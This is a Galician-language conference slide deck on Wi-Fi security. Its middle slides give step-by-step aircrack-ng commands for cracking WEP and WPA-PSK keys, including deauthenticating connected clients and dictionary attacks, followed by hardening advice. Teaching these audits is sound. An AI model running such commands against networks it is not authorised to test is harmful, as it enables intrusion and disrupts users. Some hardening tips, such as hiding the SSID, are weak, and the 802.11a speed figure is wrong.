5ª Xornadas de software libre
Raúl Piñeiro Martínez
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Motivación
Introdución
Conceptos básicos das Wi-Fis
Elementos das Wi-Fis
Auditoría Wi-Fis
Seguridade Wi-Fis
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Seguridade Wi-Fi e Software
libre
Problemática das Wi-fis
Wi-Fi e L.O.P.D.
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Que é unha Wifi? É o que comunmente se coñece como
unha rede sen fíos.
As redes ser fíos ou Wifis permiten conectar un equipo a unha rede con fin de acceder aos diferentes recursos sen necesidade de fíos.
Nas redes sen fíos a transmisión da información realizase por ondas.
5ª Xornadas de software libre
CaracterísticasMobilidade: as Wifis permiten a
posibilidade de estar conectado a unha rede e ter mobilidade.
Flexibilidade: chega a onde o cable non pode chegar, atravesa barreiras física (paredes, montañas, …) pode utilizase o aire libre ou espazos grandes.
5ª Xornadas de software libre
Características
Económicas: o non ser un medio
guiado e utilizar ondas, o despliegue
da rede e de baixo custe. O número
de usuarios que se poden conectar e
moito mais grande que nas redes que
utilizan medios guiados.
5ª Xornadas de software libre
Características
Rapidez: O non precisar de fíos para
a comunicación, o tempo de
instalación de unha rede redúcese o
feito de instalar un punto de acceso
ou de un repetidor fronte aos
elevados custes das redes con
medios guiados.
5ª Xornadas de software libre
Características técnicas As redes Wi-Fi utilizan os estándares do
IEEE 802.11 que define o uso do nivel de capa físico e o nivel de enlace de datos da arquitectura OSI.
O estándar 802.11 foi publicado no ano 1997 polo IEEE, dous anos antes, no 1995 a aparece o Bluetooh de mans de Ericson, que convertería no estándar para as comunicacións entre móbiles.
5ª Xornadas de software libre
Na actualidade o estándar IEEE 802.11
soporta múltiples protocolos, velocidades,
e utilizan diferentes bandas do espectro
electromagnético, os mas coñecidos son:
Protocolo Velocidade Banda
802.11 a 2 Mbps 5 Ghz
802.11 b 11 Mbps 2.4 Ghz
802.11 g 54 Mbps 2.4 Ghz
802.11G+ 108 Mbps 2.4 Ghz
802.11 n 600 Mbps 2.4 e 5 Ghz
5ª Xornadas de software libre
Dentro de cada banda do espectro de
utilización defínense unha serie de canles
de emisión.
A utilización das canles varia segundo o
dominio regulador:Dominio Canles
América Do 01 ao 11
Europa Do 01 ao 13
Israel Do 03 ao 09
China Do 01 ao 11
Xapón Do 01 ao 14
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
SSID: é o nome da rede. Todo os paquetes que a rede manexa conteñen esa información.
WEP: sistema de cifrado non seguro con vulnerabilidades recoñecidas.
WPA: sistema de cifrado que corrixe os problemas de WEP.
WPA2: evolución do sistema de cifrado WPA.
Channel: Canle da banda que se utiliza para trasmitir o sinal.
MAC: direccíón física de unha tarxeta de rede que ven asignada polo fabricante e que é única no mundo.
5ª Xornadas de software libre
ESSID: nome da rede
BSSID: direccíón MAC de un punto de
acceso
AES: esquema de cifrado de claves
TKIP: protocolo de cifrado de claves
Radius: protocolo de autenticación e
autorización
5ª Xornadas de software libre
IVs: vector de iniciación é un bloque de bits que é preciso para cifrar un fluxo ou bloque de datos.
ARP: protocolo de resolución de direccións
Beacons: son tramas que emiten os dispositivos sen fíos para darse a coñecer no medio e que se poda establecer unha comunicación
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Existen dous tipos de redes WI-FI en
función dos compoñentes que a
forman:
Redes AdHoc: son redes que se
establecen entre dous equipos finais (PCs,
móbiles, …). Neste tipo de redes non
existe ningún elemento de interconexión
entre os equipos.
5ª Xornadas de software libre
Redes de infraestrutura: son redes que
teñen algún elemento de interconexión sen
fíos. Este tipo de redes en algún punto
teñen que estar conectada a unha rede
con fíos. O elemento mais común de
interconexión denominase AP (Access Point),
existen diferentes tipos de AP:
○ Router Wi-Fi
○ Access points
○ Equipos cliente
5ª Xornadas de software libre
○ Router Wi-Fi: é un router convencional o que se lle engade un punto de acceso sen fíos e fai as dúas funcións.
○ Access Point: elemento de rede que centraliza as conexións de dispositivos terminais.
○ Equipos cliente: en equipos cliente temos diferentes elementos, desde PCs, impresoras, discos duros, videoconsolas, teléfonos móbiles, etc...
5ª Xornadas de software libre
○ Router Wi-Fi: é un router convencional o que se lle engade un punto de acceso sen fíos e fai as dúas funcións.
○ Access Point: elemento de rede que centraliza as conexións de dispositivos terminais.
○ Equipos cliente: en equipos cliente temos diferentes elementos, desde PCs, impresoras, discos duros, videoconsolas, teléfonos móbiles, etc...
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Para realizar unha auditoría Wi-Fi
precisamos os seguintes elementos:
Pc ou portátil
Cartón Wi-Fi que permita modo monitor
Software de auditoría Wi-Fi
5ª Xornadas de software libre
Pc ou portátil
○ E recomendable un sistema GNU/Linux para
facer o proceso, ou ven unha distribución
LiveCD.
Cartón Wi-Fi que permita modo monitor
○ Precisamos un cartón Wi-Fi que permiten a
inxección de tramas o medio, e que o mesmo
tempo podamos observar o que acontece sen
estar autenticado nunha estación.
○ http://hwagm.elhacker.net/htm/tarjetas.htm
5ª Xornadas de software libre
Software de auditoría Wi-Fi
○ Aircrack-ng
○ Distribución LiveCD Wifilax
○ Distribución LiveCD BackTrack
○ Distribución WHAX
○ Distribución WifiWay
○ Etc.
5ª Xornadas de software libre
Auditoria WEP / WPA
○ Ferramenta Aircrack-ng
Aircrack-ng: busca o contrasinal da Wi-Fi
Airmon-ng: activa el modo monitor
Airodump-ng: captura os datos trasmitidos
e recorre os Ivs.
5ª Xornadas de software libre
Aireplay-ng: realiza os ataques
- Ataque 0: Desautentificación
- Ataque 1: Autentificación falsa
- Ataque 2: Selección iterativa dun
paquete a enviar.
- Ataque 3: Reinxección de petición ARP
- Ataque 4: Predición de CRC
5ª Xornadas de software libre
Auditoria WEP
Precisamos unha tarxeta que permita
inxección de tramas
Estar cerca de AP que cifrado WEP
http://www.aircrack-
ng.org/doku.php?id=es:simple_wep_crack
5ª Xornadas de software libre
Auditoria WEP
1. Comprobamos que cartóns Wi-Fi temos
no sistema
# airmon-ng
2. Iniciamos o modo monitor co cartón
que permita a inxección de tramas
# airmon-ng start eth0
5ª Xornadas de software libre
Auditoria WEP
3. Iniciamos o airodump-ng para a
busqueda de obxetivos
# airodump-ng eth0
4. Paramos o airodump-ng e en outro
terminar comezamos a lectura:
# airodump-ng -– ivs –w canal01 –c 1 eth0
5ª Xornadas de software libre
Auditoria WEP
5. Co aireplay-ng autenticamos un cliente que teña conectado ou un cliente falso
# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h 00:AA:BB:CC:DD:EE ath0
6. Co aireplay-ng inxectamos peticiónsARP
# aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:AA:BB:CC:DD:EE ath0
5ª Xornadas de software libre
Auditoria WEP
7. Co aircrack-ng obtemos o contrasinais
# aircrack –x -0 canal01*.ivs
5ª Xornadas de software libre
Auditoria WPA
Precisamos unha tarxeta que permita
inxección de tramas
Un dicionario de contrasinais
Estar cerca de AP que teña un cliente
conectado e con cifrado WPA e
autenticación PSK. http://www.aircrack-ng.org/doku.php?id=es:cracking_wpa
5ª Xornadas de software libre
Auditoria WPA
1. Comprobamos que cartóns Wi-Fi temos
no sistema
# airmon-ng
2. Iniciamos o modo monitor co cartón
que permita a inxección de tramas
# airmon-ng start eth0
5ª Xornadas de software libre
Auditoria WPA
3. Iniciamos o airodump-ng para capturar o handshake.
# airodump-ng –c 1 --bssid 00:11:22:33:44:55 –w handshake eth0
4. Co aireplay-ng e o modo de desautenticar, lazamos un paquete de desautenticación a un cliente conectado:
# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:AA:BB:CC:DD:FF eth0
5ª Xornadas de software libre
Auditoria WPA
5. Con el aircrack obtemos a clave
compartida
# aircrack-ng -w pass.lst –b
00:11:22:33:44:55 handshake*.cap
5ª XORNADAS DE SOFTWARE LIBRE
5ª Xornadas de software libre
Medida básicas Planificar o alcance da instalación
○ Controlando o alcance da Wi-Fi podemos controlar o
radio de acción da mesma.
○ Os punto de acceso deben estar protexidos e non
estar o alcance de calquera.
○ Se temos que ampliar a capacidadade da antenas
sempre que sexa posible facelo nos clientes.
5ª Xornadas de software libre
Medida básicas Cambiar os datos de acceso do router
○ Cambiar o contrasinal por defecto dos router ou APs
para evitar que intrusos accedan a configuración do
mesmo.
○ Establezca contrasinais seguros de acceso as
configuracións.
5ª Xornadas de software libre
Medida básicas Ocultar e trocar o SSID da rede
○ Ocultando o SSID poremos trabas a usuarios alleos
a organización para que detecte a nosa rede, e so
se poderan conectas as persoas que coñezan o
nome exacto da rede.
○ Trocar o SSID de fábrica por un nome persoalizado,
de forma que non sexa una palabra trivial ou que se
poda deducir facilmente.
5ª Xornadas de software libre
Medida básicas Utilizar protocolos e sistemas de encriptación de
seguridade.
○ Utilizar sempre WPA. NON usar WEP
○ Se non queda outra opción que utilizar WEP,
cambiar o contrasinal cada pouco tempo, e revisar
os logs do AP / Router para comprabar que non hai
accesos non autorizados.
○ Utilizar contrasinais seguros no WPA, que non sexa
palabras simples, debe conter como mínimo un
número e unha letra en mayusculas.
5ª Xornadas de software libre
Medida básicas Apagar os routers / APs
○ Desconectar os routers e APs cando non se estean
a utilizar ou cando non se pensan utilizar durante
largos períodos de tempo
○ Posibilidade de utilizar temporizadores
5ª Xornadas de software libre
Medida Avanzadas Utilizar filtrado por MAC
○ Coas listas de filtrado por MAC podemos indicarlle o
noso AP / Router que direccións MAC están
autorizadas a conectarse.
○ Temos que ter en conta que esta medida por si solo
non é efectiva, xa que calquer usuario mal
intencionado pode trocar a MAC e utilizar unha de
outro equipo que si teña permisos.
5ª Xornadas de software libre
Medida Avanzadas Deshabilitar o DHCP no router
○ Utilizando IPs estáticas a seguridade da nosa WiFi
aumenta de sobremaneira.
○ O non estar activo o DHCP o usuario ten que probar
o chou cal pode ser a configuración IP.
○ Si utilizamos unha rede pouco usual
(172.19.31.XXX) e situamos a porta de enlace
nunha IP media de ese rango, as probabilidades de
dar con ela son moi baixas.
5ª Xornadas de software libre
Medida Avanzadas Autenticación de usuarios
○ Utilizar sistemas de autenticación que permitan
identificar aos usuarios.
○ Implementar una solución de portal cautibo para
autenticar aos posibles usuarios.
5ª Xornadas de software libre
Raúl Piñeiro Martínez
Top Related